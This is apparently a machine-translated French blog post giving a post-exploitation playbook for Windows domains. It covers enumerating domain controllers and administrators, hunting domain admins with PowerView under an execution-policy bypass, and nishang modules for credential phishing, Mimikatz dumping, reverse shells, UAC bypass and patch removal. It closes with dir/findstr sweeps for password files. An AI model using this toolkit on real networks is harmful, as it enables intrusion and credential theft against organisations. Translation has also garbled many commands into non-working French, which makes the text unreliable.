Partage de technologie

Sécurité intranet : détection des informations intra-domaine

2024-07-12

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

1. Collecte d'informations de base au sein du domaine

Explication détaillée des commandes 2.NET

3. Méthodes de collecte de domaines principalement utilisées dans les intranets

4. Comment trouver des contrôleurs de domaine

5. Interrogez les informations de base des utilisateurs du domaine

6. Positionnement de la gestion de domaine

7.Commandes Powershell et localisation d'informations sensibles







1. Collecte d'informations de base au sein du domaine :

Quatre situations :

1. Utilisateur local : utilisateur

2. Utilisateur administrateur local : désactivé dans la version domestique, disponible uniquement sur le serveur

3. Utilisateurs du domaine

4. Administrateur de domaine

Les utilisateurs locaux ordinaires ne peuvent pas obtenir d'informations sur le domaine

Les utilisateurs administrateurs locaux peuvent directement étendre leurs droits aux utilisateurs du système (utilisateurs du domaine) et obtenir des informations au sein du domaine.

1. Déterminez si le domaine existe :

1. Vérifiez le domaine : ipconfig/all ou systeminfo ou net config workstation

ipconfig /all : Domaine trouvé : hack.com

systeminfo : Le domaine trouvé est : hack.com

2. Affichez l'hôte DNS du domaine : nom de domaine nslookup (hack.com)

3. Temps net/domaine trois situations

Le domaine existe, mais l'utilisateur actuel n'est pas un utilisateur du domaine

Un domaine existe et l'utilisateur actuel est un utilisateur du domaine

L'environnement réseau actuel est un groupe de travail et aucun domaine n'existe

Détails de la commande 2.NET :

Vue 1.net : afficher la liste des domaines, la liste des ordinateurs, les ressources partagées de l'ordinateur spécifié : vue réseau (afficher la liste des ordinateurs) vue réseau \ ordinateur (afficher l'ordinateur partagé spécifié)

net view /domain:nom de domaine (hack) (afficher la liste des ordinateurs)

Utilisateur 2.net pour afficher les utilisateurs locaux : utilisateur net/domaine pour afficher le nombre d'utilisateurs dans le domaine

Ajouter un utilisateur : nom d'utilisateur net (admin) mot de passe (123)/ajouter

Utilisation 3.net : connectez l'ordinateur ou déconnectez l'ordinateur de la ressource partagée, affichez les informations de connexion de l'ordinateur

4.net time : utilisez le temps pour synchroniser des ordinateurs ou des domaines : net time \computer net time /domain

5.net start : Démarrez le service, ou affichez le service démarré : net start service

6.net pause : suspendre le service en cours d'exécution : service de pause nette

7.net continue : Réactiver le service : net continue service

8.net stop : Arrêter le service Windows NT/2000/2003 : service net stop

Partage 9.net : supprimer, créer ou afficher des ressources partagées

Session 10.net : Lister ou déconnecter les sessions de l'ordinateur local et des clients qui y sont connectés :

net session //ordinateur (identifie l'ordinateur à répertorier ou à mettre en session)

net session //computer delete (déconnecter la session de l'ordinateur spécifié)

11.net localgroup Afficher le groupe d'ordinateurs (applicable uniquement au local) : nom d'utilisateur net localgroup

Utilisateur du domaine : nom d'utilisateur/domaine du groupe local net

Le groupe 12.net demande le nom du groupe dans le domaine (applicable uniquement aux contrôleurs de domaine) : net group /domain

13.net config affiche les services configurables en cours d'exécution, ou affiche et modifie la configuration d'un service (localement) :

net config (affiche les services en cours d'exécution) net config services (affiche une liste de services)

Ordinateur 14.net Ajoutez ou supprimez des ordinateurs de la base de données du domaine :

net Computer \computername /add ou /del (ajouter ou supprimer des ordinateurs au domaine de connexion)

3. Méthodes de collecte de domaines principalement utilisées dans les intranets

Si « La liste des serveurs de ce groupe de travail est actuellement indisponible » apparaît, activez les services : Serveur, Station de travail, Navigateur de l'ordinateur et fermez le pare-feu.

Afficher le domaine : ipconfig/all ou systeminfo ou net config workstation

Afficher l'hôte DNS du domaine : nom de domaine nslookup (hack.com)

Domaine de requête : net view /domain

Interrogez tous les ordinateurs du domaine : net view /domain:domain name

Interrogez la liste de tous les groupes d'utilisateurs du domaine : net group /domain

Interrogez la liste des ordinateurs de tous les membres du domaine : groupe réseau "ordinateurs du domaine" /domaine

Interrogez les informations de mot de passe dans le domaine : comptes nets/domaine

Obtenez des informations sur l'approbation du domaine : nltest /domain_trusts

4. Comment trouver des contrôleurs de domaine

Afficher le nom du contrôleur de domaine : nltest /DCLIST:hack

Afficher le nom de la machine, trouver l'IP, ping/nslookup : nom du contrôleur de domaine ping/nslookup

Parfois, le ping est désactivé. Utilisez nslookup ici.

Afficher le nom d'hôte du contrôleur de domaine : nslookup ‐type=SRV _ldap._tcp

Vérifiez l'heure actuelle : heure nette/domaine

Afficher le groupe de contrôleurs de domaine : net group "Domain Controllers" /domain

5. Interrogez les informations de base des utilisateurs du domaine

1. Interroger les informations utilisateur dans le domaine : utilisateur net/domaine

2. Afficher les utilisateurs locaux : le compte utilisateur wmic obtient le nom Utilisateurs du domaine : le compte utilisateur wmic obtient le domaine, le nom

Utilisateur local :

Utilisateur du domaine :

3. Vérifiez les utilisateurs existants : utilisateur dsquery (parfois, il peut ne pas être exécuté et ne peut être exécuté que sur la machine serveur)

4. Interrogez le groupe d'utilisateurs de l'administrateur local : administrateurs net localgroup

5. Interroger les utilisateurs administrateurs de domaine : groupe réseau "administrateurs de domaine" /domaine

6. Interrogez le groupe d'utilisateurs de l'administrateur de domaine : groupe net "Enterprise Admins" /domain

6. Positionnement de la gestion de domaine

Deux outils sont nécessaires ici

Téléchargez d’abord l’outil sur le serveur, puis exécutez-le

1.PVEFindADUser : PVEFindADUser.exe -current (notez le chemin) Cet outil peut vérifier quels utilisateurs se sont connectés à l'ordinateur, nous permettant ainsi de trouver l'administrateur du domaine.

2.script powerView :

powershell.exe ‐exec bypass ‐commande "& { import‐module .PowerView.ps1;Invoke‐UserHunter}"

7.Commandes Powershell et localisation d'informations sensibles

Vérifiez d'abord les autorisations : Get-ExecutionPolicy

Modifiez la politique en cours d'exécution : Set-ExecutionPolicy Unrestricted (seules les autorisations sans restriction peuvent exécuter pow)

outil nishang (il y a un lien de téléchargement dans l'article précédent) :

Après l'avoir placé dans le répertoire CS, importez-le directement : powershell-import nishang/nishang.psm1

Exécuter : commande PowerShell

Quelques commandes couramment utilisées :

Check-VM : Vérifiez si l'hôte est une machine virtuelle

Invoke-CredentialsPhish : incitez l'utilisateur à saisir son mot de passe

Get-WLAN-Keys : informations Wi-Fi

Invoke-Mimikatz : récupérer les mots de passe

Get-PassHashes : obtenir du hachage

Get-PassHints : obtenez des informations sur le mot de passe de l'utilisateur

Invoke-PowerShellTcp : shell de rebond

Invoke-PsUACme : contourner l'UAC

Remove-Update : Supprimez le patch

Obtenir des informations : informations locales

Exemple : PowerShell Check-VM

Localisation de données sensibles :

1. Collectez divers fichiers sensibles dans des répertoires désignés

répertoire /a /s /bd:"*.txt"

répertoire /a /s /b C:"*.xlsx"

répertoire /a /s /bd:"*.md"

répertoire /a /s /bd:"*.sql"

répertoire /a /s /bd:"*.pdf"

répertoire /a /s /bd:"*.docx"

répertoire /a /s /bd:"*.doc"

répertoire /a /s /bd:"*conf*"

dir /a /s /bd:"*bak*"

dir /a /s /bd:"*mot de passe*"

dir /a /s /bd:"*passe*"

dir /a /s /bd:"*connexion*"

dir /a /s /bd:"*utilisateur*"

2. Collectez divers mots de passe de compte à partir de fichiers dans le répertoire spécifié

findstr /si passe *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si mot de passe utilisateur *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si connexion *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

findstr /si utilisateur *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak

Exemple : dir /a /s /bd:"*.txt"